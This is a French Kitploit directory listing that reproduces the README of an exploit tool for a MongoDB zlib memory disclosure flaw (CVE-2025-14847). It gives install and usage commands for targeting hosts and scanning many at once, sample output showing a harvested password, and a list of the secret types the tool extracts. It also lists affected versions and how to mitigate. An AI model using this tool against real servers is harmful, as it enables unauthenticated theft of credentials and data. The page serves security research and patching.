Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-14847_Expolit — une vulnérabilité critique de divulgation de mémoire dans la gestion de la compression zlib de MongoDB. Cet outil permet aux chercheurs en sécurité d'extraire des données sensibles d'instances MongoDB vulnérables. | Kitploit
Outils/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
Criminalistique MémoireAnalyse des VulnérabilitésExploitationExfiltration de DonnéesCollecte d'InformationsTests d'IntrusionDétection de SecretsApprentissage et ÉducationSécurité des Bases de Données

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

une vulnérabilité critique de divulgation de mémoire dans la gestion de la compression zlib de MongoDB. Cet outil permet aux chercheurs en sécurité d'extraire des données sensibles d'instances MongoDB vulnérables.

Voir le dépôt
333il y a 7 moisVérifié par Kitploit

MongoBleed-Pro ☠️

CVE Python License Status

Outil avancé d'exploitation de fuite de mémoire MongoDB
Continuez à apprendre | Continuez à hacker avec CyberTechAjju


🔥 À propos

MongoBleed-Pro est un outil d'exploitation avancé pour CVE-2025-14847, une vulnérabilité critique de divulgation de mémoire dans la gestion de la compression zlib de MongoDB. Cet outil permet aux chercheurs en sécurité d'extraire des données sensibles d'instances MongoDB vulnérables.

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant d'effectuer des tests.


💀 Détails de la vulnérabilité


🚀 Fonctionnalités

  • ☠️ Interface style hacker - Interface terminal élite avec animations
  • ⚡ Analyse multi-threadée - Extraction rapide de la mémoire avec threads configurables
  • 🎯 Détection automatique de vulnérabilité - Vérification automatique de la vulnérabilité avant exploitation
  • 🔑 Détection de motifs de secrets - Détecte les clés AWS, jetons API, mots de passe et e-mails
  • 📊 Progression en temps réel - Visualisation en direct de la fuite de mémoire
  • 💾 Export des données - Enregistre les données extraites dans des fichiers pour analyse
  • 🌐 Analyse en masse - Analyse plusieurs cibles à partir d'un fichier

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 Utilisation

Utilisation de base

root@kitploit:~
python3 mongobleed_pro.py

Cibler un hôte spécifique

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Port personnalisé

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Analyse en masse

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Options avancées

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Toutes les options


📸 Captures d'écran

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Types de secrets détectés

  • 🔑 Clés d'accès AWS (AKIA...)
  • 🤖 Clés API OpenAI (sk-...)
  • 🐙 Jetons GitHub (ghp_...)
  • 🔐 Mots de passe et secrets
  • 📧 Adresses e-mail

📁 Fichiers de sortie

FichierDescription
loot_<host>.txtSecrets extraits dans un format lisible
dump_<host>.binVidage mémoire brut pour analyse manuelle

🛡️ Atténuation

Si vous êtes administrateur MongoDB, mettez à jour vers les versions corrigées :

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Auteur

CyberTechAjju

  • 🐦 Twitter : @CyberTechAjju

📜 Licence

Ce projet est sous licence MIT - consultez le fichier LICENSE pour plus de détails.


⭐ Support

Si vous avez trouvé cet outil utile, merci de lui donner une ⭐ sur GitHub !


「 Continuez à apprendre | Continuez à hacker 」
Fait avec ❤️ par CyberTechAjju

Télécharger l’outil
PropriétéDétails
Identifiant CVECVE-2025-14847
Type de vulnérabilitéDivulgation de mémoire
Versions affectéesMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Cause racineLecture hors limites du tampon lors de la décompression zlib
ImpactFuite de mémoire à distance sans authentification
OptionDescriptionDéfaut
--targetIP/URL cibleInvite interactive
--fileFichier contenant la liste des ciblesAucun
--threadsNombre de threads50
--min-offsetDécalage mémoire minimal20
--max-offsetDécalage mémoire maximal8192